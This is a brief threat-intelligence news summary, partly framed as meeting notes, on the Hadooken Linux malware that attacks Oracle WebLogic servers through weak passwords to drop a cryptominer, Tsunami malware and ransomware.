September 13, 2024 at 08:03AM
A new Linux malware named Hadooken targets Oracle WebLogic servers to install additional malware and extract credentials. It is deployed through attacks exploiting weak passwords, then downloads shell and Python scripts to ensure successful execution. Hadooken drops a cryptominer and Tsunami malware, and creates cronjobs for persistence. Other ransomware families’ connections were also identified.
The meeting notes highlight the discovery of a new Linux malware called Hadooken, observed targeting Oracle WebLogic servers to deploy additional malware and extract credentials for lateral movement. The malware is deployed in attacks that exploit weak passwords for initial access, and upon execution, it drops a cryptominer and Tsunami malware to achieve persistence. The attackers were seen utilizing PowerShell to distribute the Mallox ransomware to Windows systems, while also targeting Linux servers with various ransomware families. It was also noted that over 230,000 internet-connected Weblogic servers are at risk due to potential vulnerabilities and misconfigurations.